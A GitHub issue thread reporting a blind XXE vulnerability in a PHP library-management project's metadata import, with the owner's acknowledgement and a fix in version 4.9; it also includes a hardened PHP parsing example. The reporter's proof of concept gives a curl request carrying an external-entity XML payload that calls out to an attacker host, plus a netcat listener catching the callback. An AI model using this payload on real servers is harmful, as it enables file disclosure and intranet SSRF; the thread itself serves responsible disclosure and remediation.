This repository has been archived by the owner on Jan 27, 2023. It is now read-only.

XXE vulnerability #116

Closed
sn00pyd0g3 opened this issue Mar 2, 2018 · 4 comments

Comments

@sn00pyd0g3

```php
if (!$xml = @simplexml_load_file($_FILES['form_import_file']['tmp_name'])) {

if (!$xml = @simplexml_load_string($_POST['form_import_textarea'])) {
```

`$_FILES['form_import_file']['tmp_name']` is passed into `simplexml_load_file()`,
`$_POST['form_import_textarea']` is passed into `simplexml_load_string()`.
This creates a blind XXE vulnerability.

Via XXE, an attacker can read the contents of a file on the target host and attack other hosts on the intranet (SSRF).

POC:

```
[sn00py.B0x] ➤ curl --request POST 'http://127.0.0.1/librarian/importmetadata.php' --cookie "PHPSESSID=fvp5dermov0tv3fqtdblc7c677" --data "form_sent=1&file_type=endnote&form_import_file=1" --data-urlencode 'form_import_textarea=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY entity SYSTEM "http://hack.me:1337/xxe_test">]><root>&entity;</root>'
Done. Total items recorded: 0
[sn00py.B0x] ➤ nc -l 1337
GET /xxe_test HTTP/1.0
Host: hack.me:1337
User-Agent: curl/7.50.3
```
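The report above quotes two bare `simplexml_load_*()` calls on attacker-controlled input. The following is an added example, not code from the Librarian project or from the reporter, showing the hardened shape such an import parser should take: reject any DOCTYPE up front (the import format has no legitimate need for one), turn off libxml's external entity loader on PHP versions where it is still enabled, and never pass `LIBXML_NOENT`. The function names `load_untrusted_xml()` and `load_untrusted_xml_file()` and the sample documents are assumptions chosen for illustration.

```php
<?php
// Added example (not the project's code): hardened replacement for the
// simplexml_load_file()/simplexml_load_string() calls quoted in the issue.
// Function names are assumptions chosen for illustration.

/**
 * Parse untrusted XML without resolving external entities.
 * Returns a SimpleXMLElement on success, null on rejection or parse error.
 */
function load_untrusted_xml(string $xml): ?SimpleXMLElement
{
    // Step 1: the import format needs no DTD at all, so reject any document
    // carrying a DOCTYPE before libxml ever sees an entity declaration.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        error_log('XML import rejected: DOCTYPE declaration present');
        return null;
    }

    // Step 2: on PHP < 8.0 external entity loading is on by default and must be
    // disabled explicitly; on PHP >= 8.0 it is off by default and the function
    // is deprecated, hence the version guard.
    if (PHP_VERSION_ID < 80000) {
        $previous = libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);

    // Step 3: never pass LIBXML_NOENT (which substitutes entities); add
    // LIBXML_NONET so libxml cannot open network resources while parsing.
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);

    if (isset($previous)) {
        libxml_disable_entity_loader($previous);
    }
    if ($doc === false) {
        foreach (libxml_get_errors() as $err) {
            error_log('XML import parse error: ' . trim($err->message));
        }
        libxml_clear_errors();
        return null;
    }
    return $doc;
}

/** Same policy for the uploaded-file path used by the import form. */
function load_untrusted_xml_file(string $path): ?SimpleXMLElement
{
    $data = file_get_contents($path);
    return $data === false ? null : load_untrusted_xml($data);
}

// Constructed sample inputs: a benign document and one shaped like the
// issue's proof of concept (DOCTYPE with an external entity declaration).
$benign  = '<?xml version="1.0"?><root><item>ok</item></root>';
$hostile = '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY entity SYSTEM "http://example.invalid/x">]><root>&entity;</root>';

var_dump(load_untrusted_xml($benign) instanceof SimpleXMLElement);
var_dump(load_untrusted_xml($hostile));
```

The DOCTYPE check is the part that actually stops the reported blind XXE: with the entity loader disabled and no `LIBXML_NOENT`, libxml would not substitute `&entity;`, but refusing the declaration outright also removes parameter-entity and billion-laughs style tricks and makes the rejection visible in the log, which is where a detection rule for import abuse would hook in.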
@mkucej
Owner

mkucej commented Mar 2, 2018

Thank you for reporting this!

@mkucej mkucej self-assigned this Mar 2, 2018
@mkucej mkucej added the bug label Mar 2, 2018
@sn00pyd0g3
Author

May I apply for a CVE ID for this bug😜?

@mkucej
Owner

mkucej commented Mar 6, 2018

Sure, you do you. :-)

mkucej added a commit that referenced this issue Mar 21, 2018
@mkucej
Owner

mkucej commented Mar 22, 2018

Fixed in 4.9. I could not coax my setup to grab any remote content from an XML, but the provided fix should prevent the XXE vulnerability.

@mkucej mkucej closed this as completed Mar 22, 2018